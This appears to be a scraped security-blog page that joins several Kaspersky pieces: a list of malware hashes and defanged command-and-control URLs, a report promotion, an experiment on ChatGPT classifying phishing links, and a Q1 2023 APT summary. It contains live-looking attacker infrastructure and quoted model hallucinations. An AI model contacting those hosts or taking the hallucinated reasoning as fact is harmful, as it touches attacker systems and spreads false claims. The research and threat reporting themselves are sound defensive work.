2B6B1F7B220C69D37A413B0C448AA56A
AA1CEC619BF65972D220904130AED3D9
0BEEC878FF2645778472B97C1F8B4113
40C451061507D996C0AB8A233BD99FF8
37162C08587F5C3009AFCEEC3EFA43EB
BDBBF20B3866C781F7F9D4F1C2B5F2D3
063093EB8F8748C126A6AD3E31C9E6FE
8095C11E404A3E701E13A6220D0623B9
ECDC4606901ABD9BB0B160197EFE39B7

C&C
hxxp://ac.iprocam[.]xyz
hxxp://ad.iprocam[.]xyz
hxxp://ap.iprocam[.]xyz
hxxp://b7.photoeffect[.]xyz
hxxp://ba3.photoeffect[.]xyz
hxxp://f0.photoeffect[.]xyz
hxxp://m11.slimedit[.]live
hxxp://m12.slimedit[.]live
hxxp://m13.slimedit[.]live
hxxp://ba.beautycam[.]xyz
hxxp://f6.beautycam[.]xyz
hxxp://f8a.beautycam[.]xyz
hxxp://ae.mveditor[.]xyz
hxxp://b8c.mveditor[.]xyz
hxxp://d3.mveditor[.]xyz
hxxp://fa.gifcam[.]xyz
hxxp://fb.gifcam[.]xyz
hxxp://fl.gifcam[.]xyz
hxxp://a.hdmodecam[.]live
hxxp://b.hdmodecam[.]live
hxxp://l.hdmodecam[.]live
hxxp://vd.toobox[.]online
hxxp://ve.toobox[.]online
hxxp://vt.toobox[.]online
hxxp://54.245.21[.]104
hxxp://t1.twmills[.]xyz
hxxp://t2.twmills[.]xyz
hxxp://t3.twmills[.]xyz
hxxp://api.odskguo[.]xyz
hxxp://gbcf.odskguo[.]xyz
hxxp://track.odskguo[.]xyz

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring and response to detected incidents based on technologies and expertise of Kaspersky Security Operations Center (SOC) team. MDR allows detecting threats at any stage of the attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting – the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques, the nature and causes of incidents and gives a breakdown by country and industry.

2022 incidents statistics Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium and low severity incidents are 30.9 and 34.2, respectively.

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific.

Industry-wise, industrial organizations suffered more incidents than any. Most of the critical incidents were detected in government agencies, industrial and financial organizations. It is worth noting though that a fair share of critical incidents across financial organizations was due to Red Teaming events.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

• Apart from the classic monitoring instruments, deploy the active threat hunting methods and tools allowing for early detection of incidents.
• Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and analyze the organization’s security.
• Practice the multilevel malware protection approach comprising various threat detection technologies – from signature analysis to machine learning.
• Use MITRE ATT&CK knowledge bases.

See the full version of the report (PDF) for more information on the incidents detected in 2022, main offensive tactics and techniques, MITRE ATT&CK classification of incidents, and detection methods. To download it, please, fill in the form below.
MktoForms2.loadForm("//app-sj06.marketo.com", "802-IJN-240", 15914, function(form) { form.onSuccess(function(values, followUpUrl){ //Take the lead to a different page on successful submit, ignoring the forms configured followUpUrl. location.href = "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/27075128/MDR-report-2022-EN.pdf"; //return false to prevent the submission handler continuing with its own processing return false; }); }); .googleRecaptcha { padding: 20px !important; } var GOOGLE_RECAPTCHA_SITE_KEY = '6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j'; var insertGoogleRecaptcha = function (form) { var formElem = form.getFormElem().get(0); if (formElem && window.grecaptcha) { var div = window.document.createElement('div'); var divId = 'g-recaptcha-' + form.getId(); var buttonRow = formElem.querySelector('.mktoButtonRow'); var button = buttonRow ? buttonRow.querySelector('.mktoButton[type="submit"]') : null; var submitHandler = function (e) { var recaptchaResponse = window.grecaptcha && window.grecaptcha.getResponse(widgetId); e.preventDefault(); if (form.validate()) { if (!recaptchaResponse) { div.setAttribute('data-error', 'true'); } else { div.setAttribute('data-error', 'false'); form.addHiddenFields({ reCAPTCHAFormResponse: recaptchaResponse, }); form.submit(); } } }; div.id = divId; div.classList.add('googleRecaptcha'); if (button) { button.addEventListener('click', submitHandler); } if (buttonRow) { formElem.insertBefore(div, buttonRow); } if (window.grecaptcha.render) { var widgetId = window.grecaptcha.render(divId, { sitekey: GOOGLE_RECAPTCHA_SITE_KEY, }); formElem.style.display = ''; } } }; function onloadApiCallback() { var forms = MktoForms2.allForms(); for (var i = 0; i < forms.length; i++) { insertGoogleRecaptcha(forms[i]); } } (function () { MktoForms2.whenReady(function (form) { form.getFormElem().get(0).style.display = 'none'; jQuery.getScript('//www.google.com/recaptcha/api.js?onload=onloadApiCallback'); }); })();

Can ChatGPT detect phishing links?

Hearing all the buzz about the amazing applications of ChatGPT and other language models, our team could not help but ask this question. We work on applying machine learning technologies to cybersecurity tasks, specifically models that analyze websites to detect threats such as phishing. What if all our complex, multi-layered detection systems are now obsolete, and a single LLM (large language model) to rule them all can fight cybercriminals better than we do?

To answer this question, we conducted an experiment to see how good ChatGPT is at recognizing overtly malicious links. In this article, we provide a practical example of how an LLM can be applied to a real, albeit simplified, cybersecurity task, and describe all the interesting things we learned along the way. Since we didn’t have any illusions that ChatGPT could actually be used as a detection method, our primary goal was to find out how much cybersecurity knowledge ChatGPT has learned from its training data and how it could possibly assist a human analyst in their job.

Why URL classification?

An analyst’s trained eye can spot an obviously malicious link in a split second (and you probably can too):

hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

• This is not the Office365 login link, is it?

(links in the article are partially masked with x)

A rule of thumb for finding tasks to which ML can be applied is that if a person can do it instantly, almost without thinking, it’s probably a good candidate. Still, building a machine-learning system requires a lot of effort, from gathering data and crafting features to preparing the infrastructure. The promise of replacing all that with a single interface configured via natural language sounds too good to be true, but just how far is it from being a reality?

When conducting this experiment, we were well aware of the limitations of large language models, as well as the fact that OpenAI asks that this emerging technology not be applied to any high-risk area, and state the following regarding GPT-4’s cybersecurity applications in the system card:

However, GPT-4 has significant limitations for cybersecurity operations due to its “hallucination” tendency and limited context window.

It is natural to assume that GPT-3.5-turbo will exhibit these limitations to a greater extent.

We chose the URL classification task because:

• Unlike a whole HTML page, a URL fits easily into an LLM, because modern LLMs, such as ChatGPT, can only consume a limited number of symbols (more precisely, tokens) at a time (they have a fixed context window, in LLM-speak).
• Obviously malicious links are easy to detect, but the task is still non-trivial, because it requires world knowledge (for example, knowing the names of popular web services).
• URLs are still text, and LLMs are good at processing text.

So here is what we did.

Let’s talk?

First of all, we opened the ChatGPT web interface and checked if what we wanted was even possible:

Judging by the URL, is this link a phishing attempt? Please explain why. Link: hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Yes, it is likely a phishing attempt.

The URL appears to be intentionally deceptive, as it contains several red flags:

• The domain name “caseld-10xxxx.info” is not associated with any reputable or recognizable entity, and it looks like a random sequence of letters and numbers.
• The URL uses the term “Office365” which is a popular productivity suite, and it is a common target for phishing attacks. Cybercriminals often use this tactic to lure unsuspecting victims into clicking on a link and disclosing sensitive information.
• The word “live” in the URL could be used to imply that the page is an official Microsoft Office365 login page, as Microsoft has used “live” in the past in some of its services.
• The misspelling of “Office” as “0fflce” is another red flag as it is a common tactic used by phishers to trick users into believing the website is legitimate.
• The “.php” extension at the end of the URL suggests that it is a PHP script running on a server, which is commonly used in phishing attacks to harvest login credentials.

Therefore, it is advisable to avoid clicking on such links and to always check the URL’s legitimacy before entering any personal information or credentials.

This is a pretty reasonable explanation. Aside from the fact that the model shows some distrust of PHP (well, who doesn’t?), it is good at recognizing the target organization, a homographic attack (0ffice), and even points out why “live” might have been used. This is an explanation worthy of a junior analyst.

To gather a corpus of explanations, we used OpenAI API to query the model called gpt-3.5-turbo, which is the backend for ChatGPT. It is fast and cheap (we check a lot of links), but still powerful enough. For the test corpus, we gathered a few thousand links that our detection technologies deemed phishing, and threw in a few thousand safe URLs.

Attempt 1. Is it phishing?

ChatGPT is great at providing the answer in the form that you require – from poems:

And lastly, “0fflce” it doth spell amiss,

A trick oft used by phishers with a hiss.

Beware, dear user, and take great care,

Lest thou fall victim to this cyber snare.

to machine-readable formats. It can also do more than one thing at once. This means that in addition to the yes/no answer to the question about link safety, we could ask ChatGPT to format the response as JSON and also to include a rationale, as well as the possible target. So, after a few iterations, we settled on the following prompt:

{"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."}, { "role": "user", "content": 'Does this link lead to a phish website? Answer in the json format {"phish": "yes|no", "reasoning": "detailed explanation why", "target_company": "possible targeted company"}\nLink: ' + url }

We use a system prompt here (according to practitioners and docs, this is less important than the user input) that portrays ChatGPT as a cybersecurity chatbot and ask for its verdict in the user prompt. Frankly, the fact that it is so easy to get the desired output from ChatGPT is awe-inspiring.

It took us two nights to get about 6,000 verdicts (probably because we ran the experiment at the peak of all the hype), and once we got the data, we proceeded to parse the results.

Unfortunately, while most of the outputs could be parsed as is, some were corrupted: some contained additional text, such as “Note: be careful when opening links…” or just a dot at the end, others had unnecessary escape characters. All in all, less than 0.5% of JSONs were broken beyond automated fixes or contained text such as:

I am sorry, but as an AI language model, I am not able to access the internet or browse the website provided. However, as per the standard industry practices, you can check the legitimacy of the website by running it through a reputable online phishing detection service/provider. Additionally, if there are any official reports of phishing attacks or scams associated with the target company, it further increases the likelihood of the link leading to a phish website.

Which is still a reasonable answer.

All in all, after all the errors and rejections, we were left with a dataset of 2322 phish and 2943 safe URLs. The resulting metrics are:

• Detection rate: 87.2%
• False positive rate: 23.2%

While the detection rate is very high, the false positive rate is unacceptable. Imagine if every fifth website you visit was blocked? Sure, no machine learning technology on its own can have a zero false positive rate, but this number is too high. To put this in perspective, in a well-known paper called URLnet, where Le et al. solved a very similar task, the authors managed to achieve about the same level of detection rate (~85%) with a false positive rate of about 0.4% with a specially crafted convolutional neural network. A more recent URLTran paper by Maneriker et al. uses Transformers (the same architecture that powers ChatGPT) to achieve an even lower FPR.

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

Unfortunately, there are no miracles here. This is also where we met the first limitation – we can’t adjust the threshold to trade FPR for DR. Or can we?

The second experiment: ‘Is it safe?’

Our prompt was probably too specific and cued the language model to view the link with suspicion. Instead of asking if the link is phishing, we could ask if it is safe to visit, and maybe the LLM would behave less suspiciously. This led us to the second prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."}, { "role": "user", "content": 'Is this link safe to visit? ' 'Answer in the json format: {"safe": "yes|no", "yes_confidence": 0.5}' '\nwhere "yes_confidence" is the confidence that the link is safe from 0 to 1. ' 'Only output json.' '\nLink: ' + url },

Differences from the previous prompt:

• Gone is the ‘cybersecurity guru’, who by nature should be suspicious of random links
• We don’t ask for the target, so as not to alert the model that this is a phishing detection task
• We do, however, ask for confidence. Though this is very unlikely, confidence may prove useful.

The results were quite discouraging:

• Detection rate: 93.8%
• False positive rate: 64.3%

It turns out that the more general prompt is more likely to prompt a verdict that the link is dangerous. This is how the links from the safe subset of data changed the assigned verdicts, compared to the previous cybersecurity guru prompt:

Internet security assistant chatbot verdicts (safe data) safe unsafe CyberGPT cybersecurity guru verdicts (safe data) safe 1049 1210 phish 2 682

Interestingly, the confidence choices are more like human-assigned confidence in the sense that round numbers like 90% occur most often:

TOP 5 probabilities that the model chose. Note that they are rounded to 0.1 (download)

At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt:

ROC curve based on probabilities provided by ChatGPT

To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt. Probably the “safety” of a link is a vaguer concept than “phish”. Understanding why the first prompt won by a large margin is difficult, and choosing the best prompt at this time, despite the emergence of new prompt engineering techniques, is more art than science.

Verdict stability

An important fact about LLMs is that the generation process is random. While you can coerce an LLM to be almost deterministic by setting its temperature parameter, which actually controls the output randomness, to 0 (there are still numerical sources of non-determinism), it usually leads to poor performance (such as the tendency to repeat the same phrase over and over again). As a result, for each token (a word or its part) that the network generates, it has a few alternatives among the choices (also controllable by parameters).

Non-deterministic verdicts are not the top feature you expect from a detection system. To measure its impact on the results, we conducted another small experiment in which we chose 200 random URLs (100 safe and 100 phish) and gathered verdicts with the same simplified prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."}, { "role": "user", "content": 'Is this link safe to visit? ' 'Answer in the json format: {"safe": "yes|no"}' '\nOnly output json.' '\nLink: ' + url },

This is how the results of these two identical runs compare (the responses are not post-processed and answer the question of whether the link is safe):

Run 2 no unknown yes Run 1 no 145 2 3 yes 4 0 46

So, the verdict for 4.5% percent of the URLs changed due to the randomness of the LLM, with the variation in verdicts between runs on safe URLs being 7%. Again, while this can be remedied by tweaking the temperature, it’s an important factor to keep in mind when using LLMs.

Organization extraction

The most striking aspect of ChatGPT’s performance was the extraction of the potential phishing target. When attackers craft their samples, they try to trick users into believing that the URL is genuine and belongs to a company, while also obfuscating it enough to fool automated analysis. Extracting the attack target can be useful in many scenarios.

ChatGPT has enough real-world knowledge to know about many internet and financial services and with only a small post-processing step (e.g., merging “Apple” and “iCloud” or removing “LLC” and “Inc”) it does a very good job at extracting them. It was able to identify a target more than half the time. Note that not every URL contains a reference to a target organization. Among the identified companies, there were major tech portals like Facebook, TikTok and Google, marketplaces such as Amazon and Steam, lots of banks from all over the world, from Australia to Russia, cryptocurrency and delivery services.

Some interesting examples include:

URL: hxxps://steancxxxmuunity.com/profiles/765xxxxxxxxxx175

Organization: Steam

Reasoning: The domain name ‘steancxxxmuunity.com’ appears to be a typo-squatting attempt. The correct spelling of the domain should be ‘steamcommunity.com’. The website is trying to impersonate Steam Community, a popular gaming platform…

URL: https://cxxxxxxxxr.com/wp-includes/js/jcrop/cgi/BOfA/Validation/login.php?cmd=login_submit

Organization: Bank of America

Reasoning: The link is suspicious and indicates a phishing attempt because the domain name is not related to the possible targeted company (Bank of America), the URL is also suspicious containing additional characters such as ‘/wp-includes/js/jcrop/cgi’…

URL: http://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Organization: Microsoft

Reasoning: The link’s domain name (caseld-10xx93.info) does not appear to be related to Microsoft’s Office 365 service. The URL path also contains a misspelled version of the word ‘office’ (0fflce) and a suspiciously old version number (3.6.5).

URL: http://adobexxxsignxxxx.duckdns.org/ees/

Organization: Adobe

Reasoning: The domain name ‘duckdns.org’ is a free dynamic DNS provider which is often used by cyber criminals for hosting phishing sites or other malicious content. Additionally, the subdomain adobexxxsignxxxx in the URL appears to imitate the legitimate Adobe service ‘Adobe Sign’, which suggests that the attackers may be targeting Adobe’s customers for information theft or fraud.

Here we see that ChatGPT detects homographic attacks (although it can confuse them with typo-squatting), and correctly states that the domains are not related to the companies. While it fails to untangle that “3.6.5” is an imitation of 365, the explanations are quite reasonable.

Implicit knowledge: reasoning analysis

The examples above are cherry-picked. When cherry-picking with the opposite intention, some funny things happen. The explanations that ChatGPT provides may include:

• References to WHOIS, which the model doesn’t have access to:
  • Finally, if we perform a WHOIS lookup for the domain name, it was registered very recently (2020-10-14) and the registrant details are hidden.
• References to content on a website that the model doesn’t have access to either:
  • the website is asking for user credentials on a non-Microsoft website. This is a common tactic for phishing attacks.
  • Additionally, the webpage’s layout and design are inconsistent with eBay’s official website, indicating that it may be a fake website designed to impersonate eBay.
  • There is also no information available on the website’s security and privacy policy. A secure website should provide that information transparently to users.
• References to SSL certificate expiration:
  • The domain ‘duckdns.org’ is not owned by Netflix, and the SSL Certificate is invalid.
• Misstatements:
  • The domain ‘sxxxxxxp.com’ is not associated with Netflix and the website uses ‘http’ protocol instead of ‘https’ (the website uses https)
• Revelatory nuggets of cybersecurity information:
  • The domain name for the URL ‘yxxxx3.com’ appears to be registered in Korea which is a red-flag.

These are funny and highlight the limitations of an LLM: while it can generate reasonable explanations, it is also prone to hallucinations – such as imagining contexts that it does not have access to, or coming up with facts that are just plain wrong.

In general, however, we see that the model demonstrates a non-trivial understanding of the task. Analyzing all the explanations by hand would be laborious, so we do some distant reading here to get a bird’s-eye overview of the reasonings it generates by applying a little bit of old-school NLP.

First of all, we noticed that the model used mostly short, terse sentences with one point per sentence in its explanations. We split the statements into sentences using the NLTK Punkt tokenizer. The resulting sentences were then vectorized using MPNet from the Sentence-Bert package, and then visualized using UMAP. To color the resulting plot, we used DBSCAN clustering. A few iterations of hyperparameter tweaking yield the following result:

Cluster analysis of explanations provided by ChatGPT. Semantically close reasons form dense clusters.

These dense clusters reveal the most popular phrases that the model provides as explanations. Some of these clusters are:

• Mentions of particular target companies.
• Recommendations not to click the link.
• Certain statements about the website being phish or not.
• Statements of uncertainty.
• References to HTTPS (or lack thereof) or SSL (usually hallucinations)
• Sentences like “This is a common tactic…”

However, some of them reveal “common tactics”:

• Use of IPFS: “The URL looks suspicious and appears to be hosted on IPFS which can be used to host malicious content.”
• Suspicious elements in path, including homographic attacks: “This link is an example of a homograph attack also known as ‘IDN homograph attack’.”
• Elements in path or domain that are related to security and urgency: “Lastly, the URL has a sense of urgency to it, indicating that the user needs to click immediately.”
• Use of dynamic DNS: “The domain name ‘duckdns.org’ is a free dynamic DNS provider that can be used by anyone to create custom subdomains, which makes it easy for attackers to use for phishing emails or websites impersonating legitimate companies”.
• An email in the parameters: “Additionally, the email address used as a query parameter may indicate a potential phishing attempt.”
• Mention of an organization in the path or subdomain while the domain is not related to the organization: “The link appears suspicious as it contains a subdomain that is not related to Amazon.”
• Elements in the domain that look autogenerated: “Also, the path ‘bafyxxxxxxxxxxxxxxxxxx43ky’ suggests that this is an autogenerated link.”

These points make a lot of sense. This means that the training data for ChatGPT contained enough cybersecurity material for the LLM to learn the telltale signs of phishing attempts and use this knowledge to analyze specific cases, which is very impressive.

Conclusion

As we have seen, for a zero-shot system the results are amazing – it is hard to argue with, even for a die-hard sceptic. Anecdotal examples, especially the cherry-picked ones, are also very impressive. This is why, when we talk about real-world performance, a screenshot from Twitter is not a solid basis for decision-making. This is especially true in cybersecurity, where applying automated scenarios to our tasks means going far beyond “good” or even “impressive” performance.

As with many other use cases, the core detection task is only part of the problem. Creating signatures or blocklist records, validating and testing them, delivering them, ensuring quality of service is less glamorous, but just as important, and here we need a lot of hard work done by humans to get things rolling.

Moreover, the use of LLM means applying a whole new set of skills. We could have improved the results, both in detection, target organization extraction and reasoning, by trying various things:

• Using a stronger model, such as GPT-4
• Using special prompt-designing patterns, such as Chain-of-Thought-prompting or Reflect-Critique-Improve
• Feeding parts of the HTML along with the URL
• Adjusting the system prompt and sampling parameters, such as temperature, etc.

However, this means abandoning the hope of a zero-shot AI that “just works”. Also, using LLMs means dealing with their current idiosyncrasies, such as the demonstrated tendency to hallucinate (manifested by coming up with imaginary explanations and referring to page texts it has never seen), randomness of output, as well as possible prompt injection attacks.

On the other hand, if we look at the organization extraction and reasoning, we have to admit that it performs on par with what we would expect from an intern-level phishing analyst: it is good, but never leave it without supervision! Therefore, it is possible to use this type of technology to assist flesh-and-blood analysts by highlighting suspicious parts of the URL and suggesting possible attack targets. It could also be used in weak supervision pipelines to improve classic ML pipelines.

All in all, while impressive, ChatGPT and LLMs are not yet ready to radically change the cybersecurity game, at least as far as phishing detection is concerned. At Kaspersky, we continue to investigate cutting-edge technologies and study their potential impact on both cyberattackers and defenders. Let’s see what happens next.

For more than five years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research; and they provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2023.

Readers who would like to learn more about our intelligence reports or request more information on a specific report, are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

While investigating possible Turla activities, we discovered that the TunnusSched backdoor (aka QUIETCANARY) was being delivered from a Tomiris implant. Having tracked Tomiris since 2021, we believe, with medium-to-high confidence, that it is distinct from Turla. So, we think that either Tomiris is conducting false-flag attacks implicating Turla, or (more likely) that Turla and Tomiris co-operate.

In late 2022, we discovered a framework called CloudWizard that has been used to target individuals and organizations located in the Russo-Ukrainian conflict area. This framework has been used since at least since 2017, with active infections continuing. It is intended for cyber-espionage, and its features include keylogging, recording using the microphone, taking screenshots and stealing website passwords and email messages. CloudWizard has similarities to Operation Groundbait, a campaign discovered by ESET, and to BugDrop, a campaign discovered by CyberX in 2017. Additionally, we discovered ties between CloudWizard and the CommonMagic framework, which we reported in January.

Russian-speaking activity

During our investigation into Tomiris’s activities in 2022, we identified the use of a previously undocumented implant developed in Rust, dubbed “JLORAT”, which was in operation as early as August 2022 and remained active into 2023.

Chinese-speaking activity

We discovered a new in-memory implant, called TargetPlug, that has been used to target game developers in South Korea since at least October 2022. Further analysis revealed that the malware is signed with valid certificates and appears to have a connection to the threat actor Winnti, a connection established through several overlaps such as shared infrastructure, code signing and victimology. We reported the misuse of the stolen “Zepetto Co.” certificate via the appropriate channel.

Middle East

We have identified ongoing spear-phishing campaigns targeting Middle Eastern countries dating back to July 2021. We assess that MuddyWater, a threat actor believed to originate from the same region, is operating these campaigns. Based on our analysis, MuddyWater was able to infect several victims in the Middle East and North Africa. The group went after high-profile entities operating in the government, aviation, energy, telecoms and banking sectors. Our investigation led us to identify the targets of interest to the attackers in this campaign. In fact, a number of spear-phishing emails seem to have been crafted and sent to employees of companies in Saudi Arabia, Turkey, the UAE, Egypt, Jordan, Bahrain, Canada, Kuwait, Israel, Syria, Azerbaijan, Armenia and Malaysia.

In late December last year, we spotted malware that relies on Microsoft Exchange for command-and-control (C2) communication and data exfiltration. Further analysis of the samples revealed it to be a variant of Oilrig’s Lookout malware, which we had reported earlier in 2020 and which targeted a ministry of foreign affairs entity in the Middle East and its branches worldwide. The new variant is also .NET-based, with several modifications in its execution flow compared to the original version; but still utilizing Exchange Web Services (EWS) via the victim’s mailbox for operations. Interestingly, one of the tools used during the intrusion is capable of informing the threat actor of password changes for the target organization’s users. This technique allows for stealthy, persistent access using valid credentials. The threat actor utilized embedded Proton Mail and Gmail addresses for data exfiltration. By analyzing the Proton Mail GPG signatures, we were able to determine that these email addresses were created on November 30, 2022, indicating that this is a recent campaign. While the initial method of entry remains uncertain, our analysis of the malware and tools used suggest that the threat actor likely continues to operate using credentials obtained from previous intrusions, which we found in one of the tools used in this campaign.

We spotted another intrusion-set and malware samples affecting an IT company in the Middle East since early August 2022. We found evidence to suggest, with medium confidence, that the IT company intrusion is linked to OilRig and its recent attack. The threat actor employed a typical Word document containing malicious macros, utilizing a job recruitment theme, to deliver PowerShell-based malware implants that collect sensitive information, including user and server credentials. Putting this into context, the threat actor could abuse the collected credentials to exploit the supply-chain relationship and compromise the IT company’s clients.

In January, we identified new malware written in the .NET language for remote console command execution that was used in a campaign dating back to December 2022. Further investigation led us to uncover what appears to be a new malicious actor, which we dubbed Trila, targeting Lebanese government entities. This actor’s toolset primarily consists of simple, homebrewed malware that enables them to remotely execute Windows system commands on infected machines. The information gathered is then exfiltrated to a legitimate interact.sh project instance that serves as a C2. In addition to the .NET malware, we also discovered Go and Rust variants of a simple, custom SOCKS proxy tool used to redirect C2 communications within the victims’ environment.

LoneZerda is an APT threat actor that is believed to have originated from Libya, with evidence of activity dating back to 2017. The actor was first publicly disclosed by Checkpoint in July 2019 and is known to use politically themed Facebook pages to trick victims into downloading and executing malware. Our findings indicate that the group was targeting diplomatic entities in countries beyond the initially reported scope (i.e., Libya), but still primarily within the Middle East. We identified indicators that the keylogging module used by the actor was still active on the computers of high-profile victims at the time we wrote our private report, although the attacker’s infrastructure had been sinkholed in March 2020. Our report sheds light on various intrusion aspects not covered by publicly available research to help organizations in the same industry verticals or in the same region to protect, detect and hunt for this activity.

Southeast Asia and Korean Peninsula

We published our analysis of observed activity over the past year and a half related to the Origami Elephant threat actor. The group has been found to use two distinct attack chains; one for deploying the known Agent K11 framework and the other for deploying the RTY framework (a successor of YTY AES). Most of the initial stages rely on macro scripts, which retain traditional script structure but also introduce new tricks. Additionally, two new simple downloaders, MinHus and Stage, were identified. These payloads are new versions of the Simple Uploader. The group has also been observed starting to use more complex algorithms to obfuscate strings, instead of simple XOR or addition and subtraction, in an effort to evade detection and attribution.

We recently investigated ScarCruft’s new malware strains and C2 server data. ScarCruft focuses on spying on individuals related to the North Korean government (including what appears to be North Korean workers abroad) and uses tools such as Chinotto for its operations. Our research uncovered a new malware strain developed in the Go language using a legitimate cloud messaging service (ably.com) as a C2 mechanism for the first time. Our monitoring of this ably.com channel shed unprecedented light on ScarCruft activities. The attackers tried to spread additional scripts for persistence and new payloads using their malware. Compromised web servers were used to host these payloads; and we detected suspicious command files on the C2 servers. We captured these commands and identified a new final payload, SidLevel, with extensive capabilities to steal sensitive information from victims. We also got access to data stolen from ScarCruft’s victims. The group continues to target individuals related to North Korea, including novelists, academic students, and also business people who appear to send funds back to North Korea.

We observed a Lazarus campaign, active until January 2023, leveraging a backdoored UltraVNC client to deliver an updated BLINDINCAN payload. The payload has new features, including plug-in-based expanding capabilities. Backdooring prominent open-source programs is one of the means that the Lazarus group has been using to deliver its malware. When executed, the compromised application functions normally but covertly collects victim information and transmits it to the C2 servers. Our telemetry shows evidence of a memory-resident payload being retrieved by the backdoored client. The delivered payload was identified as BLINDINCAN, which we have seen being delivered as second-stage malware before. This updated version of BLINDINCAN shares similar characteristics with previous iterations, such as C2 communication, encryption methods and infection procedure. However, it introduced new features, including plug-in-based expanding capabilities. Analyzing and cracking the Trojanized application’s communications, we discovered information about possible victims in the manufacturing and real-estate sectors in India as targets. Additional analysis of the C2 servers, compromised since early 2020, suggests additional targeting of telecoms companies in Pakistan and Bulgaria. We believe that this campaign is not limited to these countries and sectors.

DTrack is a backdoor that has been used by Andariel (aka StonedFly and Silent Chollima), a subset of Lazarus, for almost a decade in a wide variety of attacks, including deploying ransomware as well as espionage malware. In our previous publication about DTrack, we discussed how the backdoor evolved from its previous versions to the current version in use, as well as the new victimology. In our latest private report, we revisited a campaign from 2022 and expanded on the commands the attackers used to deploy DTrack and the accompanying post-exploitation tools and malware (e.g., 3proxy and Yamabot) deployed thereafter. We identified that the attackers probably exploited servers running vulnerable versions of Log4j to gain an initial foothold, as others have reported. Furthermore, investigating the attacker’s infrastructure helped connect additional Yamabot infections with this incident. We identified several target profiles for related Yamabot deployments, all operating in the scientific research field (biomedical, genetics and soil sciences, and energy).

Other interesting discoveries

In March, we discovered a new malware strain actively targeting a government entity in Pakistan. We designated this malware “DreamLand”. The malware is modular and utilizes the Lua scripting language in conjunction with its Just-in-Time (JIT) compiler to execute malicious code that is difficult to detect. It also features various anti-debugging capabilities and employs Windows APIs through Lua FFI, which utilizes C language bindings to carry out its activities. This is the first time we have seen Lua used by an APT threat actor since its use by AnimalFarm and Project Sauron.

Final thoughts

While the TTPs of some threat actors remain consistent over time, relying heavily on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others refresh their toolsets and extend the scope of their activities. Our regular quarterly reviews are intended to highlight the key developments of APT groups.

Here are the main trends that we’ve seen in Q1 2023:

• Established threat actors such as Turla, MuddyWater, Winnti, Lazarus and ScarCruft continue to develop their toolsets.
• There have also been campaigns from newly discovered threat actors such as Trila.
• We continue to see threat actors using a variety of different programming languages, including Go, Rust and Lua.
• APT campaigns continue to be very geographically dispersed. This quarter, we have seen actors focus their attacks on Europe, the US, the Middle East and various parts of Asia.
• The targets chosen by APT threat actors are equally diverse. They include government and diplomatic bodies, aviation, energy, manufacturing, real estate, finance, telecoms, scientific research, IT and gaming sectors.
• Geo-politics remains a key driver of APT development and cyber-espionage continues to be a prime goal of APT campaigns.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or “other-speaking” languages, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

Introduction

We introduced Tomiris to the world in September 2021, following our investigation of a DNS-hijack against a government organization in the Commonwealth of Independent States (CIS). Our initial report described links between a Tomiris Golang implant and SUNSHUTTLE (which has been associated to NOBELIUM/APT29/TheDukes) as well as Kazuar (which has been associated to Turla); however, interpreting these connections proved difficult.

We continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023, and our telemetry allowed us to shed light on the group. In this blog post, we’re excited to share what we now know of Tomiris with the broader community, and discuss further evidence of a possible connection to Turla.

Actor profile

• Tomiris focuses on intelligence gathering in Central Asia. Tomiris’s endgame consistently appears to be the regular theft of internal documents.
• The threat actor targets government and diplomatic entities in the CIS. The occasional victims discovered in other regions (such as the Middle East or South-East Asia) turn out to be foreign representations of CIS countries, illustrating Tomiris’s narrow focus.
• It is characterized by its tendency to develop numerous low-sophistication “burner” implants in a variety of programming languages that are repeatedly deployed against the same targets, using elementary but efficient packaging and distribution techniques. Tomiris occasionally leverages commercial or open-source RATs.
• Language artifacts discovered in Tomiris’s implant families and infrastructure from distinct campaigns all indicate that the threat actor is Russian-speaking.
